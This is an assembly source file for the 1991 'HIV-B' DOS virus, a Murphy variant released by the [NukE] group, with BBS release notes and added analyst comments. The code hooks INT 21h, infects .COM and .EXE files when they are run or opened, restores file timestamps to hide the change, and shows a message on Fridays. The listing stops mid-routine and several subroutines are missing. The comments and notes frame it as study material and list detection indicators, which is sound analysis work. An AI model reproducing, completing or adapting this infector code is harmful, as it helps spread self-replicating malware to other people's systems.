📄 hiv.asm
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
-----------> HIV Virus Source :
HIV - VIRUS
Created: March 1991
Scan ID: [Murphy]
Origin: Italy, "Italian Virus Laboratory!"
Sources: Produced by Rock Steady [NukE]
[NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup,
~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So
if you Scan it with SCAN McAfee & Ass. you will see that it will be
detected as the [Murphy] Virus! I got this Virus from Italy from the
"Italian Virus Laboratory!" Mind you this Virus Source is being
released to the public because it's an OLD Virus and is detectable!
and doesn't do any damage to the system! This virus was edited by
me, I removed some bugs inside and produced this SOURCE CODE ONLY!
[NOTE] Of course, this virus is ONLY for STUDYING, to learn on how
virus are made! After the viruses are old its NICE to release them so
people can study em!
HOW THE HIV - VIRUS WORKS
First, I'd like to thanx all those that thanked me for my latest
Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the
Source Codes to this virus in 6 MONTHS! Hopefully, by that time it
will be Detected by SCAN (McAfee & Ass) and yall will get a chance
to study this Assome Virus made totally from me...
HIV -: This virus spreads by copying itself to .EXE and .COM files!
~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus
hooks itself to Interrupt 21h, and total system memory will be 1632
Bytes less. Once the file is resident in memory it will attach itself
to every file that is run or opened! The date of the original file
does not change! All this virus does is copy itself over and over
again! CleanUp V77+ will get rid of it...or simply delete all files
infected with the virus...Anywayz Enjoy...
NOTE: If you want to compile the source, simply look for it in the .TXT files
contained in DATA.EXE in this newsletter package.
;-----------------------------------------------------------------------
; Absolute-offset equates (16-bit real-mode DOS, MASM/TASM syntax).
; The DATA_nnE names look auto-generated by a disassembler -- presumably
; this listing is a commented disassembly, not hand-written source.
; None of these equates is referenced in the visible part of the listing,
; so the notes below are hedged and need checking against the code that
; uses them.
;-----------------------------------------------------------------------
DATA_1E EQU 4CH ; 4Ch = 13h*4; if used with segment 0 this is the INT 13h vector slot -- confirm
DATA_3E EQU 84H ; 84h = 21h*4; if used with segment 0 this is the INT 21h vector slot -- confirm
DATA_5E EQU 90H ; 90h = 24h*4; if used with segment 0 this is the INT 24h vector slot -- confirm
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
; 0FBxxh group: meaning cannot be determined from this excerpt.
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
; Single segment with CS = DS, as in a .COM image.
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; .COM layout: code begins at offset 100h, right after the 256-byte PSP
; So the Virus starts at 0100h
;-----------------------------------------------------------------------
; HIV PROC -- analyst annotations (16-bit real-mode DOS, MASM/TASM syntax)
;
; Contents visible in this block:
;   * the .COM entry jump (target LOC_35 is outside this excerpt),
;   * plaintext marker strings and a '$'-terminated message,
;   * saved-state words (DATA_24..DATA_33),
;   * raw DB bytes that appear to be the entry of an INT 21h filter,
;   * LOC_2..LOC_13: the per-call path taken for selected file requests.
;
; Indicators a defender can take from this block:
;   * The marker strings are stored unencrypted, so they are stable
;     static byte signatures.
;   * The file time/date is read (AX=5700h) and written back (AX=5701h),
;     so a file's modification time is not a usable indicator; the
;     release notes in this file give a size growth of 1614 bytes instead.
;   * Only names ending in ".COM" or ".EXE" (upper-case compare) are
;     handled.
;
; SUB_1, SUB_4, SUB_5, SUB_6 and SUB_7 are defined outside this block.
; Every DOS function in LOC_8..LOC_11 is issued through SUB_5 rather than
; a direct INT 21h -- presumably SUB_5 reaches the original handler;
; confirm against its body.
;-----------------------------------------------------------------------
HIV PROC FAR
START:
JMP LOC_35 ; entry point at 100h; LOC_35 is not in this excerpt
; Filler of 0C3h bytes (the RET opcode). The read at LOC_8 uses offset
; 103h as its buffer, which -- assuming the JMP above assembles to three
; bytes -- is the first of these DB bytes.
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H ; ASCII "antide"
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H ; ASCII "b", then more 0C3h filler
; Plaintext identification strings (usable as static signatures).
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0 ; file time saved from AX=5700h (CX), restored at LOC_10
DATA_25 DW 0 ; file date saved from AX=5700h (DX), restored at LOC_10
DATA_26 DW 0 ; not referenced in this excerpt
DATA_27 DW 706AH ; not referenced in this excerpt
DATA_28 DD 00000H ; far pointer jumped through at LOC_13; presumably the saved original INT 21h vector -- the store is not visible here
DATA_29 DW 0 ; not referenced in this excerpt
DATA_30 DW 706AH ; not referenced in this excerpt
DATA_31 DD 00000H ; not referenced in this excerpt
DATA_32 DW 0 ; not referenced in this excerpt
DATA_33 DW 706AH ; not referenced in this excerpt
; Message in INT 21h AH=09h format ('$' terminator). SUB_1 prints from
; OFFSET DATA_34+18H, i.e. starting 24 bytes into this string.
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
; Code stored as raw bytes. Hand-decoded below -- verify with a
; disassembler before relying on it:
;   E8 83 03      CALL  (rel16 +0383h)
;   3D 4D 4B      CMP   AX,4B4Dh      ; looks like a residency self-check value
;   75 09         JNZ   +9
;   55 / 8B EC    PUSH  BP / MOV BP,SP
;   83 66 06 FE   AND   WORD PTR [BP+6],0FFFEh ; clears bit 0 (CF) of the saved FLAGS word
;   5D / CF       POP   BP / IRET
;   80 FC 4B      CMP   AH,4Bh        ; DOS EXEC
;   74 12         JZ    -> LOC_2
;   3D 00 3D      CMP   AX,3D00h      ; DOS open, read-only
;   74 0D         JZ    -> LOC_2
;   3D 00 6C      CMP   AX,6C00h      ; DOS extended open
;   75 05         JNZ   -> LOC_1
;   80 FB 00      CMP   BL,0
;   74 03         JZ    -> LOC_2 (skips the 3-byte JMP at LOC_1)
; The IRET and the function-number compares are why this is read as the
; entry of the INT 21h filter.
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13 ; request not of interest: go straight to the chained jump
LOC_2:
; Save the caller's registers; LOC_12 pops them in the reverse order so
; the original request continues with unchanged state.
PUSH ES
PUSH DS
PUSH DI
PUSH SI
PUSH BP
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6 ; not visible in this excerpt
CALL SUB_7 ; not visible in this excerpt; called again at LOC_12
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI ; for AX=6C00h the name pointer is taken from SI instead of DX
LOC_3:
MOV CX,80H ; scan at most 128 bytes
MOV SI,DX
LOCLOOP_4:
; Despite the original remark about slowing the system, this loop walks
; the path string looking for its terminating zero byte.
INC SI
MOV AL,[SI]
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2 ; SI -> last two characters of the name
CMP WORD PTR [SI],4D4FH ; "OM" (little-endian word)
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H ; "XE"
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ; extension not matched: restore registers and chain
DB 90H ; NOP padding byte
LOC_6:
CMP WORD PTR [SI-2],452EH ; ".E" -> name ends in ".EXE"
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH ; ".C" -> name ends in ".COM"
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H ; DOS open, read/write access
CALL SUB_5
JC LOC_12 ; open failed: leave the file alone
MOV BX,AX ; BX = file handle
MOV AX,5700H ; get file time (CX) and date (DX)
CALL SUB_5
MOV CS:DATA_24,CX ; remember the time stamp ...
MOV CS:DATA_25,DX ; ... and date for the restore at LOC_10
MOV AX,4200H ; seek to offset 0 from start of file
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS ; DS = CS so the read buffer is inside this segment
MOV DX,103H ; buffer at offset 103h
MOV SI,DX
MOV CX,18H ; read the first 24 bytes (header-sized)
MOV AH,3FH ; DOS read
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH ; "MZ" signature -> EXE-format file
JNE LOC_9 ; Jump if not equal
CALL SUB_1 ; MZ path
JMP SHORT LOC_10
LOC_9:
CALL SUB_4 ; non-MZ path; SUB_4 is not visible in this excerpt
LOC_10:
JC LOC_11 ; carry set by read/SUB_1/SUB_4: skip the time-stamp restore
MOV AX,5701H ; set file time/date back to the saved values
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; DOS close handle
CALL SUB_5
LOC_12:
CALL SUB_7
; Restore every register saved at LOC_2 (reverse order of the pushes).
POP AX
POP BX
POP CX
POP DX
POP BP
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28 ; far jump through the saved pointer; presumably hands the request to the original handler
DB 0B4H, 2AH, 0CDH, 21H, 0C3H ; raw bytes: MOV AH,2Ah / INT 21h / RET (DOS get date)
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX